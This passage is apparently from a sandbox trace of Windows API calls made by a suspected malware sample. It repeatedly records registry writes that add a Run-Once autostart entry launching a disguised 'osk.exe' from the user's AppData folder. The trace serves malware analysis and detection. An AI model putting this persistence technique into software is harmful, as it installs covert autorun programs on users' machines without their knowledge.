wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.109] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.109] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.109] KillTimer (hWnd=0x20280, uIDEvent=0x2488) returned 1 [0111.109] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.110] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.110] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.110] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.110] RegCloseKey (hKey=0x280) returned 0x0 [0111.110] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.110] SetTimer (hWnd=0x20280, nIDEvent=0x2489, uElapse=0xa, lpTimerFunc=0x0) returned 0x2489 [0111.110] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.124] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.124] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.124] KillTimer (hWnd=0x20280, uIDEvent=0x2489) returned 1 [0111.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.125] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.125] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.126] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.126] RegCloseKey (hKey=0x280) returned 0x0 [0111.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.126] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.126] SetTimer (hWnd=0x20280, nIDEvent=0x248a, uElapse=0xa, lpTimerFunc=0x0) returned 0x248a [0111.126] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.140] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.140] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.140] KillTimer (hWnd=0x20280, uIDEvent=0x248a) returned 1 [0111.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.141] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.141] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.141] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.141] RegCloseKey (hKey=0x280) returned 0x0 [0111.141] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.141] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.141] SetTimer (hWnd=0x20280, nIDEvent=0x248b, uElapse=0xa, lpTimerFunc=0x0) returned 0x248b [0111.142] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.156] KillTimer (hWnd=0x20280, uIDEvent=0x248b) returned 1 [0111.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.157] RegCloseKey (hKey=0x280) returned 0x0 [0111.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.157] SetTimer (hWnd=0x20280, nIDEvent=0x248c, uElapse=0xa, lpTimerFunc=0x0) returned 0x248c [0111.157] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.171] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.171] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.171] KillTimer (hWnd=0x20280, uIDEvent=0x248c) returned 1 [0111.172] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.172] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.172] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.172] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.173] RegCloseKey (hKey=0x280) returned 0x0 [0111.173] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.173] SetTimer (hWnd=0x20280, nIDEvent=0x248d, uElapse=0xa, lpTimerFunc=0x0) returned 0x248d [0111.173] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.187] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.187] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.188] KillTimer (hWnd=0x20280, uIDEvent=0x248d) returned 1 [0111.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.189] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.189] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.189] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.189] RegCloseKey (hKey=0x280) returned 0x0 [0111.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.190] SetTimer (hWnd=0x20280, nIDEvent=0x248e, uElapse=0xa, lpTimerFunc=0x0) returned 0x248e [0111.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.203] KillTimer (hWnd=0x20280, uIDEvent=0x248e) returned 1 [0111.203] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.203] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.203] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.204] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.204] RegCloseKey (hKey=0x280) returned 0x0 [0111.204] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.204] SetTimer (hWnd=0x20280, nIDEvent=0x248f, uElapse=0xa, lpTimerFunc=0x0) returned 0x248f [0111.204] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.218] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.218] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.218] KillTimer (hWnd=0x20280, uIDEvent=0x248f) returned 1 [0111.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.219] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.219] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.219] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.219] RegCloseKey (hKey=0x280) returned 0x0 [0111.220] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.220] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.220] SetTimer (hWnd=0x20280, nIDEvent=0x2490, uElapse=0xa, lpTimerFunc=0x0) returned 0x2490 [0111.220] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.246] KillTimer (hWnd=0x20280, uIDEvent=0x2490) returned 1 [0111.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.247] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.248] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.248] RegCloseKey (hKey=0x280) returned 0x0 [0111.248] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.248] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.248] SetTimer (hWnd=0x20280, nIDEvent=0x2491, uElapse=0xa, lpTimerFunc=0x0) returned 0x2491 [0111.248] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.249] KillTimer (hWnd=0x20280, uIDEvent=0x2491) returned 1 [0111.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.250] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.250] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.250] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.250] RegCloseKey (hKey=0x280) returned 0x0 [0111.250] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.251] SetTimer (hWnd=0x20280, nIDEvent=0x2492, uElapse=0xa, lpTimerFunc=0x0) returned 0x2492 [0111.251] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.265] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.265] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.266] KillTimer (hWnd=0x20280, uIDEvent=0x2492) returned 1 [0111.266] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.266] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.267] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.267] RegCloseKey (hKey=0x280) returned 0x0 [0111.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.267] SetTimer (hWnd=0x20280, nIDEvent=0x2493, uElapse=0xa, lpTimerFunc=0x0) returned 0x2493 [0111.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.280] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.280] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.281] KillTimer (hWnd=0x20280, uIDEvent=0x2493) returned 1 [0111.281] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.281] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.281] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.282] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.282] RegCloseKey (hKey=0x280) returned 0x0 [0111.282] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.282] SetTimer (hWnd=0x20280, nIDEvent=0x2494, uElapse=0xa, lpTimerFunc=0x0) returned 0x2494 [0111.282] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.296] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.296] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.296] KillTimer (hWnd=0x20280, uIDEvent=0x2494) returned 1 [0111.297] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.297] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.297] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.297] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.298] RegCloseKey (hKey=0x280) returned 0x0 [0111.298] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.298] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.298] SetTimer (hWnd=0x20280, nIDEvent=0x2495, uElapse=0xa, lpTimerFunc=0x0) returned 0x2495 [0111.298] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.338] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.338] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.338] KillTimer (hWnd=0x20280, uIDEvent=0x2495) returned 1 [0111.338] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.339] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.341] RegCloseKey (hKey=0x280) returned 0x0 [0111.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.342] SetTimer (hWnd=0x20280, nIDEvent=0x2496, uElapse=0xa, lpTimerFunc=0x0) returned 0x2496 [0111.348] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.349] KillTimer (hWnd=0x20280, uIDEvent=0x2496) returned 1 [0111.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.360] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.360] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.361] RegCloseKey (hKey=0x280) returned 0x0 [0111.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.361] SetTimer (hWnd=0x20280, nIDEvent=0x2497, uElapse=0xa, lpTimerFunc=0x0) returned 0x2497 [0111.361] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.414] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.414] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.414] KillTimer (hWnd=0x20280, uIDEvent=0x2497) returned 1 [0111.415] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.415] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.416] RegCloseKey (hKey=0x280) returned 0x0 [0111.416] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.416] SetTimer (hWnd=0x20280, nIDEvent=0x2498, uElapse=0xa, lpTimerFunc=0x0) returned 0x2498 [0111.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.421] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.421] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.421] KillTimer (hWnd=0x20280, uIDEvent=0x2498) returned 1 [0111.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.422] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.422] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.422] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.423] RegCloseKey (hKey=0x280) returned 0x0 [0111.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.423] SetTimer (hWnd=0x20280, nIDEvent=0x2499, uElapse=0xa, lpTimerFunc=0x0) returned 0x2499 [0111.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.441] KillTimer (hWnd=0x20280, uIDEvent=0x2499) returned 1 [0111.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.442] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.442] RegCloseKey (hKey=0x280) returned 0x0 [0111.442] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.442] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.442] SetTimer (hWnd=0x20280, nIDEvent=0x249a, uElapse=0xa, lpTimerFunc=0x0) returned 0x249a [0111.442] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.462] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.462] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.463] KillTimer (hWnd=0x20280, uIDEvent=0x249a) returned 1 [0111.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.463] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.464] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.464] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", 